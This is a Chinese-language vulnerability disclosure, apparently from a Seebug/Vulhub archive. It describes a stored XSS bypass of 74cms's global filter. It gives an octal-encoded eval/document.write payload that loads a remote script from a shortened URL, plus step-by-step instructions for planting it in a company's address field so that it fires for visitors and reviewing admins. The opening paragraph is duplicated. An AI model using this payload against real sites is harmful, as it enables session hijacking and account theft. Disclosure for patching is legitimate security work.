VULHUB ™

### 简要描述： 74cms(20141027)全局xss防护考虑不完善可被绕过 ### 详细说明： 防护代码就不贴出来了， 代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。 但是没有考虑下面这种的情况 ``` <script> Var xx=”qiyeid”; </script> ``` 这样的话，我们就可以这样利用 ``` <script> Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)// </script> ``` ### 漏洞证明： 正好找到了一处存储xss。 直接贴利用方法 先来注册一个企业帐号 [<img src="https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png) http://localhost/74/user/company/company_info.php?act=company_profile 重点利用在详细地址这，不过我们需要设置一下input的长度大一点 。默认长度为80，但是数据库中为250。 然后插上我们的代码。 ``` ",opts);eval('document.write("\74\163cript/\163rc=//t.cn/*****\76\74/\163cript\76")')// ``` [<img src="https://images.seebug.org/upload/201411/0200151847b143ae676fcf9132addf75dc703177.png" alt="图片2.png" width="600"...

### 简要描述： 74cms(20141027)全局xss防护考虑不完善可被绕过 ### 详细说明： 防护代码就不贴出来了， 代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。 但是没有考虑下面这种的情况 ``` <script> Var xx=”qiyeid”; </script> ``` 这样的话，我们就可以这样利用 ``` <script> Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)// </script> ``` ### 漏洞证明： 正好找到了一处存储xss。 直接贴利用方法 先来注册一个企业帐号 [<img src="https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png) http://localhost/74/user/company/company_info.php?act=company_profile 重点利用在详细地址这，不过我们需要设置一下input的长度大一点 。默认长度为80，但是数据库中为250。 然后插上我们的代码。 ``` ",opts);eval('document.write("\74\163cript/\163rc=//t.cn/*****\76\74/\163cript\76")')// ``` [<img src="https://images.seebug.org/upload/201411/0200151847b143ae676fcf9132addf75dc703177.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0200151847b143ae676fcf9132addf75dc703177.png) 保存 然后再去地图标注一下企业的位置， http://localhost/74/user/company/company_info.php?act=company_map_set [<img src="https://images.seebug.org/upload/201411/020015396a13c1696db2494876e15abdb7036104.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/020015396a13c1696db2494876e15abdb7036104.png) 这个位置就随意了。 然后等用户查看企业时 或者管理员在后台审核企业时 [<img src="https://images.seebug.org/upload/201411/020015569a2ccd5baf86e9e53d647a51be669203.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/020015569a2ccd5baf86e9e53d647a51be669203.png) 会打开如下url http://localhost/74/company/company-show.php?id=1(前台也可见，为企业的展示页面) [<img src="https://images.seebug.org/upload/201411/02001611738302cb9817cbc36607815af9922c81.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/02001611738302cb9817cbc36607815af9922c81.png)